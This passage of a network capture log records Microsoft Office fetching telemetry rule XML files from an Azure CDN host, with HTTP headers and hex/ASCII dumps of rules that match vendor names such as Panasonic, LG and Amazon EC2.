I="0" O

Session ID	Source IP	Source Port	Destination IP	Destination Port
122	192.168.2.4	51287	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-10-31 18:20:07 UTC	192	OUT	GET /rules/rule120636v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-10-31 18:20:08 UTC	470	IN	HTTP/1.1 200 OK Date: Thu, 31 Oct 2024 18:20:07 GMT Content-Type: text/xml Content-Length: 472 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT ETag: "0x8DC582B9D43097E" x-ms-request-id: 3a8fd219-b01e-0084-5fd4-2ad736000000 x-ms-version: 2018-03-28 x-azure-ref: 20241031T182007Z-159b85dff8fc5h75hC1DFWntr800000001d000000000bq9r x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-10-31 18:20:08 UTC	472	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120636" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
123	192.168.2.4	51288	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-10-31 18:20:07 UTC	192	OUT	GET /rules/rule120637v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-10-31 18:20:08 UTC	470	IN	HTTP/1.1 200 OK Date: Thu, 31 Oct 2024 18:20:07 GMT Content-Type: text/xml Content-Length: 427 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:12 GMT ETag: "0x8DC582BA909FA21" x-ms-request-id: 3601e2f9-501e-0064-27bd-2a1f54000000 x-ms-version: 2018-03-28 x-azure-ref: 20241031T182007Z-17c5cb586f6zcqf8r7the4ske0000000029g000000005bc0 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-10-31 18:20:08 UTC	427	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 41 61 5d 5b 4e 6e 5d 5b 41 61 5d 5b 53 73 5d 5b 4f 6f 5d 5b 4e 6e 5d 5b 49 69 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120637" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <SR T="2" R="([Pp][Aa][Nn][Aa][Ss][Oo][Nn][Ii][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"

Session ID	Source IP	Source Port	Destination IP	Destination Port
124	192.168.2.4	51289	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-10-31 18:20:07 UTC	192	OUT	GET /rules/rule120638v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-10-31 18:20:08 UTC	470	IN	HTTP/1.1 200 OK Date: Thu, 31 Oct 2024 18:20:07 GMT Content-Type: text/xml Content-Length: 486 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:35 GMT ETag: "0x8DC582B92FCB436" x-ms-request-id: daa440d4-101e-0028-4cca-2a8f64000000 x-ms-version: 2018-03-28 x-azure-ref: 20241031T182007Z-159b85dff8fdthgkhC1DFWk0rw00000001tg00000000g73k x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-10-31 18:20:08 UTC	486	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120638" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
125	192.168.2.4	51290	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-10-31 18:20:07 UTC	192	OUT	GET /rules/rule120639v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-10-31 18:20:08 UTC	491	IN	HTTP/1.1 200 OK Date: Thu, 31 Oct 2024 18:20:07 GMT Content-Type: text/xml Content-Length: 423 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:36 GMT ETag: "0x8DC582BB7564CE8" x-ms-request-id: 5e4053db-f01e-0052-6472-279224000000 x-ms-version: 2018-03-28 x-azure-ref: 20241031T182007Z-16849878b78sx229w7g7at4nkg000000084000000000hbaq x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-10-31 18:20:08 UTC	423	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 44 64 5d 5b 59 79 5d 5b 4e 6e 5d 5b 41 61 5d 5b 42 62 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120639" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <SR T="2" R="([Dd][Yy][Nn][Aa][Bb][Oo][Oo][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0

Session ID	Source IP	Source Port	Destination IP	Destination Port
126	192.168.2.4	51295	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-10-31 18:20:10 UTC	192	OUT	GET /rules/rule120644v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-10-31 18:20:10 UTC	470	IN	HTTP/1.1 200 OK Date: Thu, 31 Oct 2024 18:20:10 GMT Content-Type: text/xml Content-Length: 479 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT ETag: "0x8DC582BB7D702D0" x-ms-request-id: 82dd15c7-901e-0064-46c7-2ae8a6000000 x-ms-version: 2018-03-28 x-azure-ref: 20241031T182010Z-159b85dff8f7svrvhC1DFWth2s00000001ug00000000dh4h x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-10-31 18:20:10 UTC	479	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120644" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
127	192.168.2.4	51294	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-10-31 18:20:10 UTC	192	OUT	GET /rules/rule120643v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-10-31 18:20:10 UTC	470	IN	HTTP/1.1 200 OK Date: Thu, 31 Oct 2024 18:20:10 GMT Content-Type: text/xml Content-Length: 400 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT ETag: "0x8DC582BB2D62837" x-ms-request-id: a96fbf53-401e-0016-5d5d-2653e0000000 x-ms-version: 2018-03-28 x-azure-ref: 20241031T182010Z-16849878b78qf2gleqhwczd21s0000000a4g0000000084qk x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-10-31 18:20:10 UTC	400	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4c 6c 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120643" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <SR T="2" R="^([Ll][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S T="

Session ID	Source IP	Source Port	Destination IP	Destination Port
128	192.168.2.4	51293	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-10-31 18:20:10 UTC	192	OUT	GET /rules/rule120642v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-10-31 18:20:10 UTC	470	IN	HTTP/1.1 200 OK Date: Thu, 31 Oct 2024 18:20:10 GMT Content-Type: text/xml Content-Length: 468 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:24 GMT ETag: "0x8DC582BB046B576" x-ms-request-id: f3394f62-601e-0070-07f3-2aa0c9000000 x-ms-version: 2018-03-28 x-azure-ref: 20241031T182010Z-16849878b78qg9mlz11wgn0wcc00000009eg00000000hung x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-10-31 18:20:10 UTC	468	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120642" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
129	192.168.2.4	51291	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-10-31 18:20:10 UTC	192	OUT	GET /rules/rule120640v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-10-31 18:20:10 UTC	470	IN	HTTP/1.1 200 OK Date: Thu, 31 Oct 2024 18:20:10 GMT Content-Type: text/xml Content-Length: 478 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:48 GMT ETag: "0x8DC582B9B233827" x-ms-request-id: d7b90bc6-301e-001f-5d18-2baa3a000000 x-ms-version: 2018-03-28 x-azure-ref: 20241031T182010Z-15b8d89586fvk4kmbg8pf84y880000000ar000000000gw2a x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-10-31 18:20:10 UTC	478	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120640" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
130	192.168.2.4	51292	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-10-31 18:20:10 UTC	192	OUT	GET /rules/rule120641v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-10-31 18:20:10 UTC	470	IN	HTTP/1.1 200 OK Date: Thu, 31 Oct 2024 18:20:10 GMT Content-Type: text/xml Content-Length: 404 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT ETag: "0x8DC582B95C61A3C" x-ms-request-id: a783173c-501e-008c-2349-27cd39000000 x-ms-version: 2018-03-28 x-azure-ref: 20241031T182010Z-16849878b78qf2gleqhwczd21s0000000a2000000000mrb1 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-10-31 18:20:10 UTC	404	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4d 6d 5d 5b 53 73 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120641" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <SR T="2" R="^([Mm][Ss][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S

Session ID	Source IP	Source Port	Destination IP	Destination Port
131	192.168.2.4	51296	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-10-31 18:20:11 UTC	192	OUT	GET /rules/rule120645v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-10-31 18:20:11 UTC	470	IN	HTTP/1.1 200 OK Date: Thu, 31 Oct 2024 18:20:11 GMT Content-Type: text/xml Content-Length: 425 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT ETag: "0x8DC582BBA25094F" x-ms-request-id: f296e79a-801e-008c-04d4-297130000000 x-ms-version: 2018-03-28 x-azure-ref: 20241031T182011Z-17c5cb586f6f98jx9q4y7udcaw00000001a000000000pmvd x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-10-31 18:20:11 UTC	425	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 4d 6d 5d 5b 41 61 5d 5b 5a 7a 5d 5b 4f 6f 5d 5b 4e 6e 5d 20 5b 45 65 5d 5b 43 63 5d 32 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120645" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <SR T="2" R="([Aa][Mm][Aa][Zz][Oo][Nn] [Ee][Cc]2)"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I=

Session ID	Source IP	Source Port	Destination IP	Destination Port
132	192.168.2.4	51298	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-10-31 18:20:11 UTC	192	OUT	GET /rules/rule120647v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-10-31 18:20:11 UTC	491	IN	HTTP/1.1 200 OK Date: Thu, 31 Oct 2024 18:20:11 GMT Content-Type: text/xml Content-Length: 448 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT ETag: "0x8DC582BB389F49B" x-ms-request-id: 51ccb76b-001e-0049-0a37-265bd5000000 x-ms-version: 2018-03-28 x-azure-ref: 20241031T182011Z-16849878b78sx229w7g7at4nkg000000081000000000wa4z x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-10-31 18:20:11 UTC	448	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 50 70 5d 5b 41 61 5d 5b 43 63 5d 5b 48 68 5d 5b 45 65 5d 20 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120647" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <SR T="2" R="([Aa][Pp][Aa][Cc][Hh][Ee] [Ss][Oo][Ff][Tt][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR>

Session ID	Source IP	Source Port	Destination IP	Destination Port
133	192.168.2.4	51299	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-10-31 18:20:11 UTC	192	OUT	GET /rules/rule120648v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-10-31 18:20:11 UTC	491	IN	HTTP/1.1 200 OK Date: Thu, 31 Oct 2024 18:20:11 GMT Content-Type: text/xml Content-Length: 491 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT ETag: "0x8DC582B98B88612" x-ms-request-id: 39d89106-201e-003f-20a3-266d94000000 x-ms-version: 2018-03-28 x-azure-ref: 20241031T182011Z-16849878b7828dsgct3vrzta70000000089g00000000k32w x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-10-31 18:20:11 UTC	491	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: 